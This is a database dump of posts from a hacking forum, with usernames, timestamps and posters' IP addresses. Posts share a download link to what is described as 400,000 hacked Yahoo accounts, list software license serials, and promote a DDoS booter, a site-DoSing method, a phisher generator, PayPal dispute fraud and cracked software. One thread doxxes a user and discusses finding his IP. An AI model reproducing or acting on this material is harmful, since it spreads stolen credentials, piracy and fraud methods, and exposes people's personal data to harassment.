:)\r\n[/quote]\r\n\r\nThat\'s great to have multiple celebrations In the month of December.\r\n\r\nMy family can\'t choose their birthday (the actual date) as their favorite time of year. My mum and my two brothers were born on February 29 (leap year).', '210.50.40.19', '-768464877', '1', '0', '205', '1352263523', '1', 'ebf780f05084d5571379415b6995af8b', '0', '1352263523'); INSERT INTO mybb_posts VALUES('7183', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '205', 'mothered', '1352263756', 'I was going to make a suggestion on this.\r\n\r\nGood move.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a83b7f4b7dfcac2d3620816cefda4240', '0', '0'); INSERT INTO mybb_posts VALUES('7184', '1195', '7181', '47', 'RE: Premium Minecraft Accounts', '0', '1', 't3h jok3r', '1352263997', '[quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\']\r\n[quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\']\r\nhttp://l33thacking.net/thread-1215.html\r\n[/quote]\r\n\r\nI\'m not using Post and PM me, I PM them.\r\n[hr]\r\n[quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\']\r\nYou haven\'t PMed me yet :p\r\n[/quote]\r\n\r\nSorry, I Pmed you. :)\r\n[hr]\r\n[quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\']\r\nI Want to join this giveaway, need a MC account :D\r\n[/quote]\r\n\r\nPMed you also! :)\r\n[/quote]\r\n\r\nHe didn\'t say \"post here and pm me\" he said post/pm method :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49f64a852dc9c0378ed29d2085debff0', '0', '0'); INSERT INTO mybb_posts VALUES('7185', '1195', '7184', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352265009', '[quote=\'t3h jok3r\' pid=\'7184\' dateline=\'1352263997\']\r\n[quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\']\r\n[quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\']\r\nhttp://l33thacking.net/thread-1215.html\r\n[/quote]\r\n\r\nI\'m not using Post and PM me, I PM them.\r\n[hr]\r\n[quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\']\r\nYou haven\'t PMed me yet :p\r\n[/quote]\r\n\r\nSorry, I Pmed you. :)\r\n[hr]\r\n[quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\']\r\nI Want to join this giveaway, need a MC account :D\r\n[/quote]\r\n\r\nPMed you also! :)\r\n[/quote]\r\n\r\nHe didn\'t say \"post here and pm me\" he said post/pm method :P\r\n[/quote]\r\n\r\nOh sorry, but I PM the accounts, do I still need to do that?', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', 'f89eddbbf6e1f9cbf418eb527c98c651', '0', '0'); INSERT INTO mybb_posts VALUES('7186', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '54', 'Sin Cara', '1352270762', 'Thanks for the share mate.', '119.154.4.6', '2006582278', '1', '0', '0', '0', '1', '058c612bfbcd011729ca00ba6faafb34', '0', '0'); INSERT INTO mybb_posts VALUES('7187', '861', '7172', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352271750', '[quote=\'iTzIpod\' pid=\'7172\' dateline=\'1352258290\']\r\nGood job L33tHacking! :D\r\nKeep up the activity. \r\nHoping Obama wins. :)\r\n[/quote]\r\n\r\nObama WON! :cool:\r\n\r\nI was also hoping he won and he did win indeed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd38a41f8172797711d07c37de8c57dab', '0', '0'); INSERT INTO mybb_posts VALUES('7188', '1204', '7159', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352271787', '[quote=\'iTzIpod\' pid=\'7159\' dateline=\'1352254966\']\r\nI\'ve contributed a lot to that section! :p\r\n[/quote]\r\n\r\nProof: 1K posts but don\'t worry I\'m getting there bro HAHAHA :evil:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b6db1562582f85446a3d5fb117ff8ca8', '0', '0'); INSERT INTO mybb_posts VALUES('7189', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '62', 'R?????zo?', '1352273719', 'thanks for this, I will try now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a67df31d443942280e56db47172556de', '0', '0'); INSERT INTO mybb_posts VALUES('7190', '1214', '7174', '43', 'RE: Tons of PIDs', '0', '62', 'R?????zo?', '1352273771', 'Thanks bro, apreciatted :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '89a2836fa7242642e031ac06746dcabf', '0', '0'); INSERT INTO mybb_posts VALUES('7191', '1209', '7167', '15', 'RE: WinRAR cracked', '0', '62', 'R?????zo?', '1352273906', 'NICE! I had this so long ago and now I\'m sick of this error I could not find it anywhere.\nThanks alot.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e41576a7ad9d0027bb4b1eb9c66c54b5', '0', '0'); INSERT INTO mybb_posts VALUES('7192', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '62', 'R?????zo?', '1352273962', 'Will try, thanks for this :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6a1bc6a8a12d117283da982bc313ac72', '0', '0'); INSERT INTO mybb_posts VALUES('7193', '1220', '0', '12', 'Big list Hacking tutorials with .txt', '0', '62', 'R?????zo?', '1352276913', '[align=center]Heres a preview:\r\n\r\n[img]http://i.imgur.com/2Ykm9.png[/img]\r\n\r\n[lock]http://rapidshare.com/files/73671961/1000HTT.rar\r\n\r\nMirror:\r\n\r\nhttp://rapidshare.com/files/10659370...aded_Em_Ku.rar[/lock][/align]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '51db202838ce717a4bbc8b1450dc8123', '0', '0'); INSERT INTO mybb_posts VALUES('7194', '1216', '7177', '52', 'RE: [Release]Skype Resolver & GeoIP', '0', '67', 'HoverCatz', '1352285109', 'Thanks for this share :)', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '1ba9ecc2318710c1b392f9d2c29d470e', '0', '0'); INSERT INTO mybb_posts VALUES('7195', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '67', 'HoverCatz', '1352285595', 'Thanks bro :)', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', '39283f1e8a9f47e320dc493dcdc2ced8', '0', '0'); INSERT INTO mybb_posts VALUES('7196', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '67', 'HoverCatz', '1352285679', 'Thanks for this :P', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'e94abd17e95407efe3924362ce08578e', '0', '0'); INSERT INTO mybb_posts VALUES('7197', '1221', '0', '7', 'So Obama wins...', '0', '205', 'mothered', '1352289481', 'Greetings everyone,\r\n\r\nSo Obama wins his place In the White House, for yet another 4 years.\r\n\r\n\r\nWhat do you guys think of that, particularly those residing In the US?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '37256ce64b94d68283ad005d3fa0d232', '0', '0'); INSERT INTO mybb_posts VALUES('7198', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '82', 'iTzIpod', '1352290106', 'Agreed with OP :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2226437181809140f0f7b3eea0a14d2b', '0', '0'); INSERT INTO mybb_posts VALUES('7199', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352290219', 'I wanted him to win aswell :)\nGood job Obama and congratulations on winning.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb3bc1e0ecc98dabf00b52abe6032769', '0', '0'); INSERT INTO mybb_posts VALUES('7200', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352290265', '10 more posts for you. Just like 500+ more posts for me until 2,000 posts.\nBut I\'m still Top Poster?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd670aac200913b4bd35f7f1c7a8123fb', '0', '0'); INSERT INTO mybb_posts VALUES('7201', '1216', '7177', '52', 'RE: [Release]Skype Resolver & GeoIP', '0', '82', 'iTzIpod', '1352290301', 'Oh my gosh I really needed one of these! I\'ll download it ASAP', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f53bb66055c16126d3f70e67a7334892', '0', '0'); INSERT INTO mybb_posts VALUES('7202', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '82', 'iTzIpod', '1352290350', 'I wanna see what\'s inside ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe8b5aa1dc2e4c6d390d1eae7af9e0bc', '0', '0'); INSERT INTO mybb_posts VALUES('7203', '1190', '7004', '3', 'RE: New Rule', '0', '61', 'NXK', '1352293091', 'Now let\'s release some new stuff with our new system :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '7e5b226a11d4c60a4ec330da854cf908', '0', '0'); INSERT INTO mybb_posts VALUES('7204', '1221', '7197', '7', 'RE: So Obama wins...', '0', '61', 'NXK', '1352293161', 'I\'m happy that mitt didn\'t win. He would have eliminated the middle class in America.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '5d3fdee70bf23b93851aea0de9da6d73', '0', '0'); INSERT INTO mybb_posts VALUES('7205', '1195', '7185', '47', 'RE: Premium Minecraft Accounts', '0', '61', 'NXK', '1352293263', '[quote=\'Purps™\' pid=\'7185\' dateline=\'1352265009\']\r\n[quote=\'t3h jok3r\' pid=\'7184\' dateline=\'1352263997\']\r\n[quote=\'Purps™\' pid=\'7181\' dateline=\'1352263004\']\r\n[quote=\'NXK\' pid=\'7176\' dateline=\'1352258763\']\r\nhttp://l33thacking.net/thread-1215.html\r\n[/quote]\r\n\r\nI\'m not using Post and PM me, I PM them.\r\n[hr]\r\n[quote=\'iTzIpod\' pid=\'7131\' dateline=\'1352236739\']\r\nYou haven\'t PMed me yet :p\r\n[/quote]\r\n\r\nSorry, I Pmed you. :)\r\n[hr]\r\n[quote=\'VirtualLegend\' pid=\'7120\' dateline=\'1352230420\']\r\nI Want to join this giveaway, need a MC account :D\r\n[/quote]\r\n\r\nPMed you also! :)\r\n[/quote]\r\n\r\nHe didn\'t say \"post here and pm me\" he said post/pm method :P\r\n[/quote]\r\n\r\nOh sorry, but I PM the accounts, do I still need to do that?\r\n[/quote]\r\n\r\nYou\'re allowed to do this. That\'s what the thread I posted earlier was stating.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f60ac18947c63091a07e8e31af0689dc', '0', '0'); INSERT INTO mybb_posts VALUES('7206', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '325', 'Perfection', '1352296702', 'Holy shit.\nThat\'s a lot of stuff.\nThanks for the share!\nWill put this into use.\n\nEDIT: Both links are dead. :(', '107.204.89.253', '1808554493', '0', '0', '325', '1352296753', '1', 'b45a8caacd09c1a9c5d6504553edf92d', '0', '1352296753'); INSERT INTO mybb_posts VALUES('7207', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '53', 'sirchamp', '1352304520', 'I also will try this. Posting to unlock the download link..', '81.161.18.1', '1369510401', '1', '0', '0', '0', '1', '0cbbfb762f6c5af14ef4bde57cd2fd9d', '0', '0'); INSERT INTO mybb_posts VALUES('7208', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '150', 'MinecraftGeek', '1352308927', 'Is Kasual a bully or something?', '109.145.197.193', '1838269889', '0', '0', '150', '1352325099', '1', '33edf1a4a5429ed4e8ab874b1c65142c', '0', '1352325099'); INSERT INTO mybb_posts VALUES('7344', '1209', '7167', '15', 'RE: WinRAR cracked', '0', '1', 't3h jok3r', '1352534038', 'Looks like you are presenting a project lol. Thanks for the share.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c476a193b136e9fdb60c5533366ab163', '0', '0'); INSERT INTO mybb_posts VALUES('7210', '1212', '7171', '30', 'RE: Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '53', 'sirchamp', '1352314462', 'Thanks alot. Need this... :D', '27.230.66.100', '468075108', '1', '0', '0', '0', '1', 'd0bfea7eb207cb79eb6afb2e56b4ee66', '0', '0'); INSERT INTO mybb_posts VALUES('7211', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '53', 'sirchamp', '1352314590', 'Post to unlock .......Thanks btw', '193.29.189.16', '-1055015664', '1', '0', '0', '0', '1', 'eb29451869f82087375ef042c1ae752b', '0', '0'); INSERT INTO mybb_posts VALUES('7212', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '228', 'VirtualLegend', '1352315328', 'Thank you so much Purps You\'re Awesome :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '8faf587eedc4eed45212cbe112801d2f', '0', '0'); INSERT INTO mybb_posts VALUES('7213', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '228', 'VirtualLegend', '1352315449', 'Gonna try it out for you guys :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7e6f752aca956a200374276b628a3a41', '0', '0'); INSERT INTO mybb_posts VALUES('7214', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '228', 'VirtualLegend', '1352315542', 'Looks Nice, Did you made it?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'a84ba94f5ad200df291e3c0b96774c92', '0', '0'); INSERT INTO mybb_posts VALUES('7215', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '228', 'VirtualLegend', '1352315615', 'Nice Share, Hope i can SE Fifa 13', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'a1db5f025c7e8acb456f02e2667f0b0f', '0', '0'); INSERT INTO mybb_posts VALUES('7216', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '228', 'VirtualLegend', '1352315847', 'I Can see the download link !!!\n\nWithout posting !!!!!!', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '414c35883cc92d9ef4d2fc196e5ad000', '0', '0'); INSERT INTO mybb_posts VALUES('7217', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '257', 'XxTREYZxX', '1352316618', 'Thanks foe this cant wait to find out.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '0a819ccfb131d4909f4282e139f56cfe', '0', '0'); INSERT INTO mybb_posts VALUES('7218', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '257', 'XxTREYZxX', '1352316992', 'I will be using this alot.\nBecause i am the minecraft man.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '93b04211311f0b86ddb5d2c8e9598409', '0', '0'); INSERT INTO mybb_posts VALUES('7219', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '228', 'VirtualLegend', '1352317366', 'Now everyone will understand it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '4e8eb903f7b64acc200a5434b50601f9', '0', '0'); INSERT INTO mybb_posts VALUES('7220', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1352318123', 'Haha lmao...yeh sorry guys', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', '3962099c14a76d2f2b6ea96fbfcf88b0', '0', '0'); INSERT INTO mybb_posts VALUES('7221', '1217', '7178', '29', 'RE: Win all paypal disputes!', '0', '228', 'VirtualLegend', '1352321629', 'I WANT IT :D\n\nSeems Useful', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'fe8e32e4f676b14a09dd976b244d997c', '0', '0'); INSERT INTO mybb_posts VALUES('7222', '1214', '7174', '43', 'RE: Tons of PIDs', '0', '228', 'VirtualLegend', '1352322172', 'What does PID means? Just asking', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'bade26da158ba4ce1bba2f06951e6396', '0', '0'); INSERT INTO mybb_posts VALUES('7223', '1218', '7179', '17', 'RE: Camdecoy bitch available here', '0', '67', 'HoverCatz', '1352326281', 'cuz ure a mod :p', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '1fb6a5597de1310b1cfb5c8affa73fde', '0', '0'); INSERT INTO mybb_posts VALUES('7224', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '67', 'HoverCatz', '1352326602', 'thanks for this :)\nedit: this doesnt work for me.', '178.74.57.144', '-1303758448', '1', '0', '67', '1352327299', '1', '25dd470619a32b1c641f62521bd24d5b', '0', '1352327299'); INSERT INTO mybb_posts VALUES('7225', '1221', '7197', '7', 'RE: So Obama wins...', '0', '1', 't3h jok3r', '1352328882', 'I\'m glad Obama won. If Romney would have won then he would have kicked out native Americans and separated African Americans.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e9f65c035eb5645e535e757180586e5', '0', '0'); INSERT INTO mybb_posts VALUES('7226', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '82', 'iTzIpod', '1352331026', '@Expose, what happened to your site?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2180a76d2826a220b974d73f2bb2f95f', '0', '0'); INSERT INTO mybb_posts VALUES('7227', '1078', '7208', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352333629', 'Finally site is back up.\r\n\r\n[quote=\'MinecraftGeek\' pid=\'7208\' dateline=\'1352308927\']\r\nIs Kasual a bully or something?\r\n[/quote]\r\n\r\nHe was a major leaker, he steals others work and claims it as his own and leaked 60% of L33T Hackings content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '37787c36ee953f78601e1725b4ca335e', '0', '0'); INSERT INTO mybb_posts VALUES('7228', '1203', '7164', '21', 'RE: Jok3r Manual DoSing sites method', '0', '1', 't3h jok3r', '1352333802', '[quote=\'iTzIpod\' pid=\'7164\' dateline=\'1352255308\']\r\n@t3h jok3r, you should add credits to the OP who made those threads \r\n\r\n\r\n\r\nCredits to \r\n@iTzIpod (Me)\r\n@Timmy\r\n@spacefish36\r\n[/quote]\r\n\r\nThe links bring them to the thread on LH which has the original posters name so I believe it\'s good and it\'s up to Timmy to update it or not or maybe he didn\'t add any credits because he doesn\'t want anyone to be in trouble.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '89e9905ae9babff4c475009cc5a61146', '0', '0'); INSERT INTO mybb_posts VALUES('7229', '1204', '7200', '3', 'RE: We are L33T', '0', '1', 't3h jok3r', '1352333858', '[quote=\'iTzIpod\' pid=\'7200\' dateline=\'1352290265\']\r\n10 more posts for you. Just like 500+ more posts for me until 2,000 posts.\r\nBut I\'m still Top Poster?\r\n[/quote]\r\n\r\nYeah you are the top poster and I think I\'m the second.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5da364473da56006ab786d0155b50d86', '0', '0'); INSERT INTO mybb_posts VALUES('7230', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '205', 'mothered', '1352346695', 'Hence, what goes around, comes around.\r\n\r\nGood work mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'db1f441d863c4108ed3e81a2d92492e4', '0', '0'); INSERT INTO mybb_posts VALUES('7231', '1220', '7193', '12', 'RE: Big list Hacking tutorials with .txt', '0', '205', 'mothered', '1352346839', 'Judging by what Perfection documented above, If you can please re-up, that\'ll be great.\r\n\r\nThanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '85c4aae885cf00637ae4188f590516ae', '0', '0'); INSERT INTO mybb_posts VALUES('7232', '1222', '0', '13', '400,000 Hacked Yahoo Accounts Dumps', '0', '9', 'p420', '1352349546', 'Okay, so a group called D33D hacked over 400,00+ yahoo accounts and i still have the file\nso i thought i might share it with you guys.The file was to big to post on pastebin or upload to LH so i had to upload it to zippyshare. [lock][url=http://www8.zippyshare.com/v/10655363/file.html]Click here[/url][/lock]\n\nIt\'s TXT file if you want to be on the safe side then run it on sandboxie or upload it to virustotal.', '72.231.24.165', '1223104677', '0', '0', '9', '1352391961', '1', 'de6638a02199fb27882bb6898c4924ed', '0', '1352391961'); INSERT INTO mybb_posts VALUES('7233', '1223', '0', '69', '[Release] IP Manager', '0', '9', 'p420', '1352349889', 'Here is a IP Manager\n\nWhy Not Just Use Notepad?\n[list]\n[*]Because this program looks awesome\n[*]Easily accessible\n[*]Friendly UI\n[*]Noob Friendly\n[*]Notepad is stupid =3\n[/list]\n\nWhat\'s To Come?\n[list]\n[*]Copy IP on Right Click\n[*]Updates Checker\n[*]Ad Spaces (allow you to advertise within the program) (?)\n[*]User Registration (?)\n[/list]\n\n(?) = Thinking about, is not definite.\n\n[lock]\nDownload Link:\nhttp://www.mediafire.com/?y3tah52sp288ag3\n\nVirus Scan:\n0/43\nhttps://www.virustotal.com/file/8f8b1732fe4b4da0fd232fe521d9e65a55d23a76660532b8e7f22071a39b0728/analysis/1332204222/\n[/lock]\nCredits: Forgot who created this, I found this on my PCs notepad.', '72.231.24.165', '1223104677', '0', '0', '9', '1352350158', '1', '7c968e42d3441188ce6ebc58cbcd9f9d', '0', '1352350158'); INSERT INTO mybb_posts VALUES('7234', '1224', '0', '68', 'Twitter Bootstrap Tutorial', '0', '9', 'p420', '1352350103', 'You may be asking what is twitters bootstrap and why would I want to use it?\n\nBootstrap is a sleek, intuitive, and powerful front-end framework for faster and easier web development.\n\nPro\'s and Cons\n\nPros: \n- Easy to use\n- Pre coded css\n- Pre coded jquery\n- Very well documented\n- Tablet/ mobile support\n- For all browsers!\n\nCons:\n- so far none.\n\nwell, you might be asking what do I need to use this?\n \nyou\'re going to need a web server, ftp client, a text editor, and last but not lest bootstrap\n\n[lock]\nDownload the bootstrap here: http://twitter.github.com/bootstrap/index.html\n\nDocument page about the bootstrap: http://twitter.github.com/bootstrap/scaffolding.html\n\nFor these examples I used Notepad++\n\n\nFirst extract, the file and then Upload the bootstrap to your webserver using a ftp client not that hard...\n\nSo your root should look like {root dir}/bootstrap\n\nand you should see a css folder and a js folder, in the bootstrap directory\n\nsoo, now lets move on and start writing somecode\n\nso go to your root directory and write this html template,\n\n[img]http://img138.imageshack.us/img138/9754/e7056d74d2b7478f9ff2123.png[/img]\n\nhere is the code for you lame asses, \n\n[code]\n<!-- Immortal @ Anarchy Forums -->\n\n <!DOCTYPE html>\n <html>\n \n <head>\n <title>Example Code</title>\n <!-- Loading the bootstrap css file -->\n <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\n </head>\n \n <body>\n \n <h1>Hello, world!</h1>\n <!-- Loading jquery -->\n <script src=\"http://code.jquery.com/jquery-latest.js\"></script>\n <!-- Loading the bootstrap javascript file -->\n <script src=\"/bootstrap/js/bootstrap.min.js\"></script>\n \n \n </body>\n \n </html>\n[/code]\n\n\nSoo now we are going to use, navbar to give us a sexy link tablet.\n\n[img]http://img208.imageshack.us/img208/755/9d520dfa099f4047bb42f97.png[/img]\n\n[code]\n<!-- Immortal @ Anarchy Forums -->\n <!DOCTYPE html>\n <html>\n <head>\n <title>Example Code</title>\n <!-- Loading the bootstrap css file -->\n <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\n </head>\n \n <body>\n <div class=\"navbar\">\n <div class=\"navbar-inner\">\n <a class=\"brand\" href=\"#\">Welcome Home</a>\n <ul class=\"nav\">\n <li class=\"active\"><a href=\"#\">Page 1</a></li>\n <li><a href=\"#\">Page 2</a></li>\n <li><a href=\"#\">Page 3</a></li>\n </ul>\n </div>\n </div>\n <!-- Loading jquery -->\n <script src=\"http://code.jquery.com/jquery-latest.js\"></script>\n <!-- Loading the bootstrap javascript file -->\n <script src=\"/bootstrap/js/bootstrap.min.js\"></script>\n \n </body>\n </html>\n[/code]\n\nhere is, what the site looks like.\n\n[img]http://img21.imageshack.us/img21/6694/86db50116b00440ab2f99c9.png[/img]\n[/lock]', '72.231.24.165', '1223104677', '0', '0', '9', '1352350136', '1', '6fedb6d1cbba3fae064d7178d8ecd92c', '0', '1352350136'); INSERT INTO mybb_posts VALUES('7235', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '9', 'p420', '1352350193', 'I reached 100 posts :D\n\nMost were tutorials.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2dbaf4b2dc837cc62b5888b55a5b39b2', '0', '0'); INSERT INTO mybb_posts VALUES('7236', '765', '6142', '46', 'RE: Vulcan Private Pisher Generator', '0', '7', 'Romdu62', '1352350337', '[quote=\'Rave™\' pid=\'6142\' dateline=\'1350937597\']\r\nThanks\r\n[code] [/code] [code] [/code] [code] [/code]\r\n[/quote]\r\n\r\nOh your welcome you LQ mother fucking leecher.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bfbdd9194a33fc545c7e6f0d79f78786', '0', '0'); INSERT INTO mybb_posts VALUES('7237', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '257', 'XxTREYZxX', '1352353831', 'Thanks heaps man.\ni will use this.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '4f58a3b86a8c742c1f1f176075862985', '0', '0'); INSERT INTO mybb_posts VALUES('7238', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1352353933', 'Good on you p420\non your 100th post.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'e53e3ddd23d9738e91f148db16af9e8a', '0', '0'); INSERT INTO mybb_posts VALUES('7239', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '150', 'MinecraftGeek', '1352361170', 'http://notsoanonymo.us/index.php?/topic/10-kasuals-dox/page__gopid__32#entry32', '86.147.121.117', '1452505461', '0', '0', '0', '0', '1', 'c8343127601af5671925cd1546fae1b5', '0', '0'); INSERT INTO mybb_posts VALUES('7240', '1222', '7232', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '67', 'HoverCatz', '1352363425', 'lock it inside [ lock]HERE[ /lock] without space', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', 'ae3e535cafea15719829197ca8253b80', '0', '0'); INSERT INTO mybb_posts VALUES('7241', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '67', 'HoverCatz', '1352365114', 'Thanks for this :)', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', 'fd5d7cff029c3e5aa6282d3ecea92cc0', '0', '0'); INSERT INTO mybb_posts VALUES('7242', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '228', 'VirtualLegend', '1352371915', 'Hope i will understand it', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '4929d3f4821e4f4f965c153bdca508a6', '0', '0'); INSERT INTO mybb_posts VALUES('7243', '1204', '7084', '3', 'RE: We are L33T', '0', '228', 'VirtualLegend', '1352372370', 'The next milestone is 7777 Posts :P', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '620e42e1e875a208a3551e14b9ae77b8', '0', '0'); INSERT INTO mybb_posts VALUES('7244', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '330', 'Dage', '1352373378', 'I will try it and see if it works.', '78.3.250.129', '1308883585', '0', '0', '0', '0', '1', '79dc00bb6bb790142f8d3981e8779889', '0', '0'); INSERT INTO mybb_posts VALUES('7246', '1222', '7240', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '9', 'p420', '1352391976', '[quote=\'HoverCatz\' pid=\'7240\' dateline=\'1352363425\']\r\nlock it inside [ lock]HERE[ /lock] without space\r\n[/quote]\r\n\r\nDone. Thanks for reminding me.', '165.155.208.77', '-1516515251', '0', '0', '0', '0', '1', 'e2a4662e80fbcb17ce39788ffde31628', '0', '0'); INSERT INTO mybb_posts VALUES('7247', '1078', '7239', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352393341', '[quote=\'MinecraftGeek\' pid=\'7239\' dateline=\'1352361170\']\r\nhttp://notsoanonymo.us/index.php?/topic/10-kasuals-dox/page__gopid__32#entry32\r\n[/quote]\r\n\r\nSince we have his Skype it would be easier to find his current IP.', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', 'fc0baa625fbd87d78aeacedec693a146', '0', '0'); INSERT INTO mybb_posts VALUES('7248', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '1', 't3h jok3r', '1352393452', 'Thanks to NXK for this idea. This idea is very useful and would definitely stop the leechers.', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', '9e4b049d4bfaeb9c8a5b18e11449f365', '0', '0'); INSERT INTO mybb_posts VALUES('7249', '1225', '0', '25', '[Serials] Malwarebytes Full keys Dump', '0', '5', 'Timmy', '1352393640', 'Hope you get a working one, they should be working. Enjoy.\r\n\r\nDownload Malwarebytes: \r\n\r\nhttp://www.malwarebytes.org/ (Free Download)\r\n\r\nUse any of the following codes: (I used the first one and it worked)\r\n\r\n[code]\r\nSerials:\r\n\r\n6IE48\r\n2V34-29J4-CGWY-FTEF\r\n\r\n5TI39\r\n1CX6-BLVV-MPN4-UYGC\r\n\r\n2IX56\r\nRF8L-295V-TP7G-J3QE\r\n[/code]', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', '1592f828fe4bc3481470982e7ff2aa7b', '0', '0'); INSERT INTO mybb_posts VALUES('7250', '1226', '0', '30', 'Release Cracked - Youtube Booster Pro edition!', '0', '5', 'Timmy', '1352393844', 'I checked it, it is still working :D\r\n\r\nNot sure if it\'s backdoored but run in sandbox just incase :)\r\n\r\nScreenshot\r\n\r\nhttp://easycaptu.re/r0fZp\r\n\r\n[lock] 